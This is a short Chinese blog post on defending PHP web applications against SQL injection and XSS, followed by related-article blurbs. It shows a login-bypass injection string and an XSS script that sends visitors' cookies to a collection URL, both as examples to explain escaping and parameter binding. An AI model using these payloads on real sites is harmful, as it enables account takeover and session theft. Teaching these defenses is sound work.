关于web安全方面的几个防范措施

最新推荐文章于 2024-09-01 16:04:46 发布
原创 最新推荐文章于 2024-09-01 16:04:46 发布 · 1.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了SQL注入和XSS攻击的基本原理及其防御措施。对于SQL注入,通过使用预编译语句和参数绑定等方法来防止恶意输入;对于XSS攻击,则通过过滤和转义用户提交的数据来避免潜在的安全风险。

1,关于sql注入

用户提交登录信息的时候可以用 password ' or 1 #   这样原来sql拼接语句就成了  select * from table where username=xxx and password ='password' or 1#' 这样就登陆用户得到了登录信息了。完成了一次sql注入

解决方式

第一:用addslashes  把提交的字符 转义一下特殊字符

第二:用pdo参数绑定的形式

$dbh = new PDO("mysql:dbname=la;host=127.0.0.1","root","");
$sth = $dbh->prepare("select * from users where username=:username");
$sth->execute(array('username'=>$username));
$result = $sth->fetchAll();

第三: 验证数据的正确性了,比如限制字符数量,规定数据类型


2,xss攻击 

这种攻击场景一般就是在评论的时候会提交一些script代码  ,如果没有过滤 。那么危险性比较大,比如写一段

<script>
var url = "http://localhost//toucookie.php?cookie=" + document.cookie;
var img = document.createElement("img");
img.src = url;
document.appendChild(url);
</script>
这一段  当其他的用户点击这个图片的时候,就会自动发送他在这个网站的cookie信息给攻击者,攻击者有了cookie信息,就可以很多事情了,比如获取用户的信息,有可能能直接登录到用户的后台。

解决方式

1,在做评论这种提交数据的时候  用htmlspecialchars  把html的一些东西转换为实体。

2,可以用strip_tags去除掉html标签

3,过滤掉一些scipt标签等 ,需要看具体的业务需求

常见的web安全问题及防范方法
Adam的博客
12-08 8140
sql注入漏洞名称SQL注入漏洞漏洞原理通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。漏洞分类1. 平台层SQL注入:            不安全的数据库配置或数据库平台的漏洞所致2. 代码层SQL注入:            程序员对输入未进行...
Web应用安全攻防战:识别十大威胁,掌握防护要点
网络安全
03-30 2342
Web应用安全攻防战:识别十大威胁,掌握防护要点
web安全措施.你写的WEB API接口如何预防黑客攻击_webservice接口实例
12-25
web安全措施.你写的WEB API接口如何预防黑客攻击 现在WEB开发都是动静分离 后端编写API接口 那如何防止黑客攻击你的HTTP API接口呢
Web安全与防御措施
xiaoxiao3112的博客
02-17 3790
服务攻击:针对程序漏洞进行攻击常见的有: SQL注入攻击文件上传攻击XSS跨站脚本攻击CSRF(Cross-site request forgery)跨站请求伪造程序逻辑漏洞 暴力攻击:如DDOS,穷举密码等C段攻击 某台服务器被攻陷后通过内网进行ARP、DNS等内网攻击社会工程学 收集管理员等个人信息等资料尝试猜测其密码或者取得信任等 最基本原则 永远不要相信用户提交上来的数据(包括
Web一些主要的安全防护措施
DavidLiu的博客
05-05 6042
OWASP (安全防护、漏洞验证工具) 开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)是一个组织,它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。 开放式Web应用程序安全项目(OWASP)是一个非营利组织,不附属于任何企业或财团。因此,...
常见web安全及防护原理
乐辞的博客
09-01 1324
请注意,以上示例仅为了说明XSS攻击和CSRF攻击的原理,并非真实的攻击代码。或者攻击者在论坛中一个恶意表单,当用户提交表单的时候,却把信息传送到攻击者的服务器中,而不是用户原本以为的信任站点。请注意,为了有效地防止XSS和CSRF攻击,应采用综合的安全措施,并进行定期的安全审查和测试。表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。比如:攻击者在论坛中放一个看似安全的链接,骗取用户点击后,窃取。发送GET请求,将页面中的Cookie信息发送给攻击者控制的服务器。
白帽子讲web安全_WEB安全_
09-29
Web安全涵盖了许多方面,包括但不限于以下几个核心知识点: 1. **SQL注入**:这是Web应用中最常见的攻击之一,攻击者通过构造恶意SQL语句,获取、修改或删除数据库中的敏感信息。防止SQL注入的关键在于使用预编译...
Web安全领域跨站脚本(XSS)攻击及其综合防护方法研究
最新发布
03-25
内容概要:文章重点研究了跨站脚本(XSS)攻击...其他说明:文章还提及了几项先前关于XSS防御的相关研究成果,讨论了一些改进的方向。随着Web技术不断发展,持续跟踪最新的安全趋势至关重要,以便及时调整和完善相应的
精选资源
企业级Web服务器安全主动防御措施
01-20
笔者认为,这很大一部分原因是管理员在Web安全防护上太被动。他们只是被动的防御。为了彻底提高Web服务器的安全,笔者认为,Web安全要主动出击。具体的来说,需要做到如下几点。  一、在代码编写时要进行漏洞测试...
精选资源
WEB安全测试分类及防范测试方法
06-20
WEB安全测试是确保Web应用程序免受恶意攻击的关键环节,它涉及到多个层面的检查与防护,以确保系统的稳定性和用户数据的安全。以下将详细介绍几种主要的WEB安全测试分类及其防范测试方法。 1. **Web应用程序部署...
Web应用程序安全防护
jkqa_123的专栏
09-06 2008
 在网上读到一篇文章《Web应用程序引起了大量的攻击》http://searchsecurity.techtarget.com.cn/securitynews/490/2493990.shtml?BLK=050001&NODE=1005后决定学习一下Web应用程序安全防护,以下是我的一些总结:Web应用程序安全问题主要为:                                
web网络安全防护方案
a38417的博客
02-07 6644
Web信息系统高速发展的今天,Web信息系统的各种各样的安全问题已暴漏在我们面前。Web信息系统各种安全问题潜伏在Web系统中,Web系统的时时刻刻遭受各种攻击的安全威胁。这里就跟大家聊聊web网络安全防护方案。 Web网络安全分为两大类:   · Web服务器的安全性(Web服务器本身安全和软件配置)。   · Web应用程序的安全性(在Web服务器上运行的Java、 ActiveX、PHP、ASP代码的安全)。   Web服务器面临的攻击   Web服务器攻击利用Web服务器软件和配...
Web应用的常见安全问题和防御措施:打造安全Web应用环境
weixin_39372311的博客
07-11 928
Web应用的安全问题是一个复杂而严峻的挑战。了解Web应用的常见安全问题,并采取有效的防御措施和安全最佳实践,对于打造安全Web应用环境至关重要。通过不断学习和实践,我们可以提高Web应用的安全性,保护用户数据和业务逻辑,维护互联网的安全和稳定。
常见Web安全问题及防御策略
LuHai3005151872的博客
12-09 712
安全世界观一词是《白帽子讲Web安全》一书的开篇章节,多年后再读经典,仍然受益匪浅! 正如开篇所说的:“互联网本来是安全的,自从有了研究安全的人,互联网就不安全了。” 世上没有攻不破的系统,只有还没攻破的系统,有多少条路可以通罗马,大概就有多少种攻克之道。
Web应用安全十大主动安全措施
ABC-II
11-23 1213
1:Content-Security-Policy Content Security Policy是Mozilla为了提高浏览器安全性开发的一套新的安全机制,该机制让网站可以定义内容安全政策,明确告知浏览器哪些内容是合法的,让浏览器得以避开恶意内容。CSP主要锁定解决XSS及跨站冒名请求(Cross Site Request Forgery)等网络应用程序漏洞。强烈建议用户将该告警打开,你可
Web安全:常见的安全问题及防范措施
shandongjiushen的博客
12-09 2478
警惕安全问题,防止信息裸奔!
常见的web安全及防护原理
liu0415111的博客
03-18 8663
写在前边最近想整理一下这方面的一些知识,所以专门查阅了一些资料,跟大家一块儿共享一下。如果有说的不对的地方,欢迎大家指出。sql注入原理相信很多同学应该都会听过这个,具体就是通过把sql命令插入到web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql命令防范1.永远不要信任用户的输入,要对用户的输入进行校验,可以通过正则表达式,或限制长度,对单引号和双"-"进行转换等。2.
基本Web安全防范
MaiYo_
08-19 1640
防止跨站脚本攻击XSS 使用freemarker ?html 转义字符串 防止session劫持 1.通过发放令牌并在拦截器中验证令牌的方式 2.令牌增用户IP与浏览器环境,验证用户授权时环境,与当前访问环境是否一致 3.将JSESSIONID的cookie设置为HttpOnly,方式:Tomcat context.xml 文件中配置 4.将其他cookie也设置为HttpOnly,
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值